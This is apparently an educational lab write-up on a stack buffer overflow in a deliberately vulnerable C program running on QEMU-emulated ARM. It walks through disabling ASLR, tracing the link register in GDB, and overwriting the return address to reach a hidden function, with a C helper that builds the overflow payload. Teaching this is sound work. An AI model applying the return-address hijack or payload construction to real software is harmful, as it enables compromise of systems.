BUFFER OVERFLOW EXPLOITATION ON ARM ARCHITECTURE EMULATED WITH QEMU BY DEBUGGING WITH GDB
- Layout for this exercise:
1 - QEMU
- QEMU (short for Quick Emulator) is a free and open-source hosted hypervisor that performs hardware virtualization (not to be confused with hardware-assisted virtualization).
- QEMU is a hosted virtual machine monitor: it emulates CPUs through dynamic binary translation and provides a set of device models, enabling it to run a variety of unmodified guest operating systems.
- QEMU can also do CPU emulation for user-level processes, allowing applications compiled for one architecture to run on another.
- For further information about QEMU:
https://en.wikipedia.org/wiki/QEMU
http://www.qemu-project.org/
- In this exercise QEMU will be used to emulate the ARM architecture on an Ubuntu virtual machine.
- There is plenty of information on the web about setting up and enabling QEMU on an Ubuntu machine, for instance:
https://www.unixmen.com/how-to-install-and-configure-qemu-in-ubuntu/
https://askubuntu.com/questions/138140/how-do-i-install-qemu
- In particular, I strongly recommend this tutorial about Debian Armel and QEMU:
https://www.youtube.com/watch?v=Vxx3miRSOgQ
- After following the instructions from the Debian Armel tutorial above, the script LaunchVM.sh is run:
- As a result of running the script, Debian-Armel with QEMU is finally available:
- Examining the content of LaunchVM.sh, there is a redirection to port 2222, which makes it easier to run commands on the emulated machine:
- Connecting with SSH to the ARM emulation at port 2222 (password = exploit):
3 - Writing, compiling and executing a test program in C
- Now, let's write a basic program in C that, under normal operation, outputs a welcoming message (WELCOME TO WHITELIST) when main() is executed:
- However, because vfunction() calls strcpy(), a crafted input parameter could cause the undesired function secret() to be executed, displaying a forbidden message (THIS A CONFIDENTIAL INFORMATION):
- strcpy() is an unsafe function of the C library: its prototype char *strcpy(char *dest, const char *src) carries no size for dest, so it performs no bounds checking and keeps copying bytes from src until it reaches the terminating null byte.
https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm
- If the source src (the input parameter) is longer than the destination dest (in this case buff[10]), the remaining bytes are written past the end of the buffer and may overwrite important areas of memory.
- For further information about Buffer Overflows and strcpy():
https://en.wikipedia.org/wiki/Stack_buffer_overflow
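To make the missing bounds check concrete, here is a minimal sketch of the test that strcpy() does not perform. The helper copy_checked() is a hypothetical name introduced only for illustration; it is not part of the exercise program, which deliberately keeps the unchecked strcpy().

```c
#include <string.h>

/*
 * Hypothetical helper (not part of the original program): copies src into
 * dest only if it fits, including the terminating null byte.
 * Returns 0 on success and -1 if src is too long for dest_size bytes.
 */
int copy_checked(char *dest, size_t dest_size, const char *src)
{
    size_t needed = strlen(src) + 1;   /* characters plus the null terminator */

    if (needed > dest_size) {
        return -1;                     /* strcpy() would write past dest here */
    }
    memcpy(dest, src, needed);
    return 0;
}
```

With a destination declared as char buff[10], an 8-character input such as AAAABBBB fits, while a 20-character input is rejected instead of spilling over the rest of the stack frame.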
- The program is compiled with GCC using the -g option, which produces extra debugging information that GDB will use later:
- As a result of the compilation, the executable or binary confidential is produced:
- Running the program with a normal input like A, vfunction() is executed after being called by main() and the welcoming message is displayed:
- Note that under normal execution the secret() function is never run.
4 - Disabling Address Space Layout Randomization (ASLR)
- Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks.
- In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries:
https://en.wikipedia.org/wiki/Address_space_layout_randomization
- For the sake of simplicity in this exercise, and to prevent the Linux kernel from applying ASLR, we set the value of randomize_va_space to 0:
- Checking that ASLR has been disabled:
- For further information about Linux and ASLR:
https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/
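The same check can be sketched in C by reading the kernel setting from procfs. The function name read_aslr_setting() is an assumption made for this example; the path /proc/sys/kernel/randomize_va_space is the standard location of the setting on Linux, where 0 means disabled and 1 or 2 mean randomization is active.

```c
#include <stdio.h>

/*
 * Reads the integer stored in a procfs-style file such as
 * /proc/sys/kernel/randomize_va_space.
 * Returns the value read, or -1 if the file cannot be opened or parsed.
 */
int read_aslr_setting(const char *path)
{
    FILE *fp = fopen(path, "r");
    int value = -1;

    if (fp == NULL) {
        return -1;
    }
    if (fscanf(fp, "%d", &value) != 1) {
        value = -1;                    /* file did not contain an integer */
    }
    fclose(fp);
    return value;
}
```

Calling read_aslr_setting("/proc/sys/kernel/randomize_va_space") inside the emulated machine should return 0 once ASLR has been disabled as described above.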
5 - Analyzing and running the program with debugger GDB
- Now, let's load the executable confidential into the GNU Debugger (GDB) in quiet, non-verbose mode (-q option):
- The program includes three available functions: main(), secret() and vfunction()
- Disassembling main():
- Disassembling vfunction():
- Disassembling secret():
- Setting a breakpoint at the vulnerable function vfunction():
- Remembering that the buffer was declared with 10 char elements, let's run the program with a normal input parameter "AAAABBBB" (just 8 characters).
- The breakpoint is hit just before vfunction() is executed:
- Checking the contents of the registers, note that LR (Link Register) holds the address 0x84a8:
- LR (Link Register) is the ARM register that saves the return value of the PC (Program Counter) when a subroutine is entered, i.e. the address of the instruction that follows the call.
- In other words, LR stores the address the program must return to after the subroutine has completed.
- By controlling the value that ends up in LR, the whole flow of the program can be controlled, as we'll see later.
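As a small illustration of the return address described above, the following sketch uses the GCC/Clang builtin __builtin_return_address(0), which yields the address the current function will return to. On ARM this is the value that LR holds on entry to the function. The function name where_do_i_return() is hypothetical and only serves this example.

```c
/*
 * __builtin_return_address(0) is a GCC/Clang extension that returns the
 * address the current function will return to. The noinline attribute keeps
 * the function a real call, so that a return address actually exists.
 */
__attribute__((noinline)) void *where_do_i_return(void)
{
    return __builtin_return_address(0);
}
```

Printing the result with printf("%p\n", where_do_i_return()) from a caller shows an address inside that caller, just after the call instruction.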
- Examining the first 10 words of the stack in hexadecimal, before executing vfunction():
- Stepping forward and executing vfunction():
- Now, the input bytes AAAA (0x41414141) and BBBB (0x42424242) have been copied onto the stack:
- Continuing the execution up to the end of the program the welcoming message is displayed, as expected:
6 - Overflowing the stack
- Now, instead of entering fewer than 10 characters, let's enter 20 characters (more than buff[10] can hold):
- Stepping through vfunction():
- Examining the stack, the saved value of LR has been overwritten with 0x45454545 (corresponding to EEEE):
- Continuing up to the end of the program, there is a Segmentation fault:
- The Segmentation fault occurs because, when the overwritten value 0x45454545 is loaded into the PC on return, the program finds no executable instruction at that memory address.
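The position of the bytes that landed in LR can be worked out mechanically. The sketch below assumes the 20-character input was AAAABBBBCCCCDDDDEEEE (the exact string is not shown in the text, only that EEEE reached LR); offset_of_word() is a hypothetical helper name.

```c
#include <stdint.h>
#include <string.h>

/*
 * Returns the offset in `input` of the first 4 bytes that, read as a
 * little-endian word, equal `word`; returns -1 if they do not occur.
 */
long offset_of_word(const char *input, uint32_t word)
{
    unsigned char needle[4];
    size_t len = strlen(input);
    size_t i;

    /* Little endian: the least significant byte is stored first. */
    needle[0] = (unsigned char)(word & 0xff);
    needle[1] = (unsigned char)((word >> 8) & 0xff);
    needle[2] = (unsigned char)((word >> 16) & 0xff);
    needle[3] = (unsigned char)((word >> 24) & 0xff);

    for (i = 0; i + 4 <= len; i++) {
        if (memcmp(input + i, needle, 4) == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

Under that assumption, offset_of_word("AAAABBBBCCCCDDDDEEEE", 0x45454545) gives 16, meaning that 16 filler bytes precede the bytes that overwrite the saved LR.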
7 - Controlling the program flow by crafting the input parameter
- Going ahead with the exploitation of the program, let's find the memory address at which the secret() function starts:
- Also:
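- Now, instead of the former EEEE characters, let's enter the memory address of the function secret(), so that it is run instead of the normal flow of execution of the program.
- secret() starts at 0x8438, but the address is stored in memory in little-endian order, so it must be entered with its bytes reversed: 0x8438 becomes \x38\x84. The two upper bytes (0x0000) do not need to be entered, because strcpy() appends a terminating zero byte and the remaining byte of the saved LR (previously 0x000084a8) is already zero: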
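The crafted input can also be assembled programmatically. This is only a sketch under stated assumptions: build_payload() is a hypothetical helper, the filler character 'A' is arbitrary, and the offset of 16 bytes assumes that the four EEEE characters of the earlier 20-character input were the ones that reached LR.

```c
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: writes `offset` filler bytes followed by the
 * non-zero low-order bytes of `addr` in little-endian order, then a null
 * terminator. Returns the payload length (without the terminator), or 0 if
 * `out` is too small or the address contains an embedded zero byte, which
 * could not be passed inside a C string argument.
 */
size_t build_payload(char *out, size_t out_size, size_t offset, uint32_t addr)
{
    size_t n = offset;

    if (out_size < offset + 5) {       /* filler + up to 4 bytes + terminator */
        return 0;
    }
    memset(out, 'A', offset);

    while (addr != 0) {
        unsigned char byte = (unsigned char)(addr & 0xff);
        if (byte == 0) {
            return 0;                  /* embedded zero would end the string early */
        }
        out[n++] = (char)byte;         /* least significant byte first */
        addr >>= 8;
    }
    out[n] = '\0';
    return n;
}
```

For example, build_payload(buf, sizeof buf, 16, 0x8438) produces 16 filler bytes followed by \x38\x84, for a total length of 18 bytes.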
- The breakpoint is hit before vfunction() is executed:
- Stepping forward:
- Examining the stack, the saved value of LR has now been successfully overwritten with 0x00008438 (the address where the function secret() starts):
- Continuing up to the end of the program the secret() function is executed and the secret message is finally displayed, instead of the welcoming one:
- From the shell environment, the same result is obtained:
- Note that the remarkable aspect of this exercise is not the Buffer Overflow itself, but the fact that it has been carried out with a C program executed on an ARM architecture emulated with Debian-Armel and QEMU.